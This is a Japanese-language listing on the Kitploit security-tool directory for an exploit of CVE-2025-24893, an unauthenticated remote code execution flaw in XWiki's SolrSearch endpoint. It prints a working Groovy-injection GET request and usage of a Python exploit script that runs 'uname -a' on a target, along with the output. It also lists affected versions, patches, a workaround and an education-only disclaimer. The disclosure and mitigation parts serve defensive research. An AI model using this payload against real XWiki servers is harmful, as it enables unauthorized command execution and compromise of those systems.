Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-24893 | Kitploit
ツール/GitHubGitHub/b0ysie7e/cve-2025-24893
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育リモートアクセスツール
GitHubb0ysie7e/cve-2025-24893

CVE-2025-24893

リポジトリを見る
11311ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-24893 のエクスプロイト

CVE-2025-24893 は、XWiki Platform に影響を及ぼす重大な未認証リモートコード実行 (RCE) 脆弱性です。
この欠陥により、認証を必要とせずに、ゲストユーザーが SolrSearch エンドポイントへの特別に細工された RSS リクエストを介して、任意の Groovy コード を注入・実行できます。

これは影響を受けるシステムの機密性、完全性、可用性に直接影響します。

概要

  • 影響を受けるバージョン:
    • XWiki ≥ 5.3-milestone-2 から < 15.10.11
    • XWiki ≥ 16.0.0-rc-1 から < 16.4.1
  • CVSS v3.1 スコア: 9.8 (重大)
    ベクター: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • 悪用可能性: 非常に簡単 — 単一の HTTP GET リクエストで十分です。

⚠️ 免責事項:

このコードは教育および研究目的専用です。明示的な許可なくシステムに対して使用すると、法律違反となる可能性があります。
作者は、本ツールの不正使用や悪意のある活動について一切責任を負いません。

概念実証 (POC)

root@kitploit:~
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=}}}{{async async=false}}{{groovy}}println("Hello from search text:42"){{/groovy}}{{/async}}

エクスプロイトスクリプトの使用方法

このセクションでは、CVE-2025-24893 を利用する Python エクスプロイトスクリプトのセットアップと実行方法について説明します。


root@kitploit:~
❯ python3 CVE-2025-24893.py
usage: CVE-2025-24893.py [-h] -u URL -c COMMAND
CVE-2025-24893.py: error: the following arguments are required: -u/--url, -c/--command
root@kitploit:~
❯ python3 CVE-2025-24893.py -u http://10.10.10.10:8080 -c 'uname -a'
[*] Sending payload to: http://10.10.10.10:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln("uname -a".execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d

[+] Command output 'uname -a':

Linux 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
                                  

緩和策

修正済みバージョンへの更新:

脆弱性を修正するには、XWiki を以下のいずれかのバージョンに更新してください。

  • XWiki 15.10.11
  • XWiki 16.4.1
  • XWiki 16.5.0 RC1

一時的な回避策:

直ちに更新できない場合は、以下の一時的な修正を適用できます。

  1. SolrSearchMacros.xml ファイル (Main.SolrSearchMacros に配置) の 955 行目 付近を編集します。
  2. 出力ロジックを、コンテンツタイプを application/xml に設定した rawResponse マクロを使用するように置き換えます。
    参考として、macros.vm の 2824 行目 にある実装を使用してください。

参照:

  • NVD - CVE-2025-24893
  • Ionix Blog
  • Miggo.io
ツールをダウンロード